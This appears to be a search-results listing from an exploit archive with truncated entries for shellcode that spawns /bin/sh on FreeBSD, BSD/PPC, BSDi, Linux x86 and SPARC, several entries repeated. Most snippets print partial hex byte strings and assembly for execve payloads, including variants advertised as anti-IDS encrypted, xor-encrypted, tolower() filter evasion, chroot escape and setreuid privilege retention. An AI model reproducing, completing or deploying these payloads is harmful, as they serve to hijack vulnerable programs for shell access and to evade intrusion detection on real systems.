1149 matches found
freebsd/x86 execve /tmp/sh 34 bytes
No description provided by source. / FreeBSD shellcode - execve /tmp/sh Claes M. Nyberg 20020120 [email protected], [email protected] / / void main asm" xorl %eax, %eax eax = 0 pushl %eax string ends with NULL pushl $0x68732f2f push 'hs//' //sh pushl $0x706d742f push 'pmt/' /tmp movl %esp...
bsd/PPC - execve /bin/sh 128 bytes
bsd/PPC execve /bin/sh 128 bytes. Shellcode exploit for bsdppc platform / Linux PPC shellcode execve of /bin/sh by Palante / long shellcode = / Palante's BSD PPC shellcode w/ NULL/ 0x7CC63278, 0x2F867FFF, 0x41BC005C, 0x7C6802A6, 0xB0C3FFF9, 0xB0C3FFF1, 0x38867FF0, 0x38A67FF4, 0x38E67FF3,...
bsdi/x86 - execve /bin/sh 46 bytes
bsdi/x86 execve /bin/sh 46 bytes. Shellcode exploit for bsdix86 platform / BSDi execve of /bin/sh by v9 [email protected] / static char exec= "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c" / 14 characters. / "\x89\x76\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff" / 14 characters. /...
linux/x86 unix/SPARC execve /bin/sh 80 bytes
No description provided by source. / Linux/x86 and Unix/Sparc execve of /bin/sh by dymitri!!! / include stdio.h char wcode= "\x90\x90\xeb\x34\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc" "\xa2\x14\x63\x68\xe0\x3b\xbf\xf0\xc0\x23\xbf\xf8\x90\x23\xa0\x10"...
linux/x86 execve /bin/sh encrypted 58 bytes
Exploit for linux/x86 platform in category shellcode =========================================== linux/x86 execve /bin/sh encrypted 58 bytes =========================================== / !!!!!! PRIVATE !!!!!!! // ANTI-IDS SHELLCODE // // !!!!!!!!!!!!!!!!!! // email protected 0x1d abril 0x7d2...
linux/x86 execve /bin/sh 38 bytes
Exploit for linux/x86 platform in category shellcode ================================= linux/x86 execve /bin/sh 38 bytes ================================= / email protected execve /bin/sh main char name2; name0="/bin/sh"; name1=NULL; execvename0,name,NULL; / include char shellcode= "\xeb\x18" //...
linux/x86 execve /bin/sh encrypted 58 bytes
linux/x86 execve /bin/sh encrypted 58 bytes. Shellcode exploit for linx86 platform / !!!!!! PRIVATE !!!!!!! // ANTI-IDS SHELLCODE // // !!!!!!!!!!!!!!!!!! // [email protected] 0x1d abril 0x7d2 ./test.c !!! Shellcode execve sh Encriptada !!! AHORA EN 58 BYTES !!!!!!!!!!!!!! Notese que la...
linux/x86 unix/SPARC execve /bin/sh 80 bytes
linux/x86 unix/SPARC execve /bin/sh 80 bytes. Shellcode exploits for multiple platform / Linux/x86 and Unix/Sparc execve of /bin/sh by dymitri!!! / include char wcode= "\x90\x90\xeb\x34\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc"...
linux/x86 bsd/x86 execve /bin/sh 38 bytes
No description provided by source. / Linux/x86 and Bsd/x86 execve of /bin/sh by dymitri!!! / include stdio.h char code = "\x31\xc0" "\x50" "\x68\x2f\x2f\x73\x68" "\x68\x2f\x62\x69\x6e" "\x89\xe3" "\x50" "\x54" "\x53" "\x50" "\x8c\xe0" "\x21\xc0" "\x74\x04" "\xb0\x3b" "\xeb\x07" / si es bsd saltam...
linux/x86 execve /bin/sh setreuid(12 12) 50 bytes
No description provided by source. / Linux/x86 An example of setregid, execve /bin/sh I used this in practise, hence the setregid12, 12; / include stdio.h char c0de = / main: / / setregid12, 12; / "\x29\xc0" / subl %eax, %eax / "\xb0\x47" / movb $71, %al / "\x29\xdb" / subl %ebx, %ebx / / Here's...
linux/x86 execve /bin/sh tolower() evasion 41 bytes
No description provided by source. / Linux/x86 tolower evasion, execve /bin/sh eg use: various qpop exploits / include stdio.h char c0de = / main: / "\xeb\x1b" / jmp callz / / start: / "\x5e" / popl %esi / "\x89\xf3" / movl %esi, %ebx / "\x89\xf7" / movl %esi, %edi / "\x83\xc7\x07" / addl $0x07,...
linux/x86 unix/SPARC execve /bin/sh 80 bytes
Exploit for multiple platform in category shellcode ============================================ linux/x86 unix/SPARC execve /bin/sh 80 bytes ============================================ / Linux/x86 and Unix/Sparc execve of /bin/sh by dymitri!!! / include char wcode=...
linux/x86 execve /bin/sh tolower evasion 41 bytes
linux/x86 execve /bin/sh tolower evasion 41 bytes. Shellcode exploit for linx86 platform / Linux/x86 tolower evasion, execve /bin/sh eg use: various qpop exploits / include char c0de = / main: / "\xeb\x1b" / jmp callz / / start: / "\x5e" / popl %esi / "\x89\xf3" / movl %esi, %ebx / "\x89\xf7" /...
linux/x86 execve /bin/sh setreuid12,12 50 bytes
linux/x86 execve /bin/sh setreuid12,12 50 bytes. Shellcode exploit for linx86 platform / Linux/x86 An example of setregid, execve /bin/sh I used this in practise, hence the setregid12, 12; / include char c0de = / main: / / setregid12, 12; / "\x29\xc0" / subl %eax, %eax / "\xb0\x47" / movb $71, %a...
linux/x86 break chroot execve /bin/sh 80 bytes
No description provided by source. / This is Linux chroot/execve code.It is 80 bytes long.I have some ideas how to make it smaller, but till then use this one. signed predator linux registered user : 181116 preedatoratsendmaildotru / char...
linux/x86 bsd/x86 execve /bin/sh 38 bytes
Exploit for multiple platform in category shellcode ========================================= linux/x86 bsd/x86 execve /bin/sh 38 bytes ========================================= / Linux/x86 and Bsd/x86 execve of /bin/sh by dymitri!!! / include char code = "\x31\xc0" "\x50" "\x68\x2f\x2f\x73\x68"...
linux/x86 execve /bin/sh xor encrypted 55 bytes
Exploit for linux/x86 platform in category shellcode =============================================== linux/x86 execve /bin/sh xor encrypted 55 bytes =============================================== / .file "xor-encrypted shellcode" .version "1.0" .text .align 4 .globl main .type main,@function...
linux/x86 execve /bin/sh setreuid(12,12) 50 bytes
Exploit for linux/x86 platform in category shellcode ================================================= linux/x86 execve /bin/sh setreuid12,12 50 bytes ================================================= / Linux/x86 An example of setregid, execve /bin/sh I used this in practise, hence the setregid12...
linux/x86 execve /bin/sh 24 bytes
No description provided by source. / [email protected] execve/bin/sh. 24 bytes. es lo mas chica que se puede hacer. / char shellcode= "\x31\xc0" // xorl %eax,%eax "\x50" // pushl %eax "\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e "\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f "\x89\xe3" // mov...
linux/x86 break chroot execve /bin/sh 80 bytes
linux/x86 break chroot execve /bin/sh 80 bytes. Shellcode exploit for linx86 platform / This is Linux chroot/execve code.It is 80 bytes long.I have some ideas how to make it smaller, but till then use this one. signed predator linux registered user : 181116 preedatoratsendmaildotru / char...